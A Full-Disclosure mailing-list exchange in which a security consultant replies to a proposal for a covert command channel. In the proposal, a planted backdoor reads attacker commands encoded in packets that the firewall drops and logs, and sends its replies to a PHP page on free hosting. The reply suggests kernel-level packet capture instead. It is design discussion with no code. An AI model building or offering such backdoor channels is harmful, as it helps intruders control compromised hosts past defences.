if you have system access, why not capture packets at kernel level, BEFORE they reach the firewall. your approach seems to be very noisy ;)
PASTOR ADRIAN wrote: > Sometime ago I thought of the following idea for a covert channel.it would be > better to intercept packets at kernel level BEFORE they > Although the idea of covert channels is *not* new at all, I couldn't > find anything in Google related to the following method of implementing > a covert channel. > > The scenario is the following. The victim is a host with a host-level > firewall which is blocking *all* incoming traffic. Somehow the attacker > still needs to communicate with a backdoor planted in this host. Use a > reverse shell and job done, you might say. > Actually, there is another way which I thought would be more creative > (IMHO). > > It works like this: the backdoor enables logging in the host-level > firewall for all dropped packets, say Windows XP SP2 Firewall. Then the > backdoor receives commands from the attacker by interpreting the > properties of the dropped packets which were logged by the firewall. In > other words, the backdoor is constantly reading the logs and parsing > commands which were sent by the attacker embedded in packets which are > being dropped (but logged) by the firewall. > > attacker sends packets -> packets are dropped by firewall -> packets > properties are captured in logs -> backdoor reads logs and finds > encoded commands -> commands are executed > > Now, for the way the backdoor would reply back to the victim is really > up to you. One method that comes to my mind is by posting the responses > to a PHP script which is located in some free-hosting webpage. The > attacker would then access this webpage. > > Please, if you know anything related to backdoors intercepting commands > from log files send me some links. Ideas, comments and flames are more > than welcome :-) . > > Regards, > pagvac (Adrian Pastor) > Earth, SOLAR SYSTEM > www.adrianpv.com <http://www.adrianpv.com> > www.ikwt.com <http://www.ikwt.com> (In Knowledge We Trust) > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- _____________________________________________________ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Consult Unternehmensberatung GmbH ~ www.sec-consult.com ~ A-1080 Wien Blindengasse 3 ~ Tel: +43/676/840301718 ~ Fax: +43/(0)1/4090307-590 ______________________________________________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
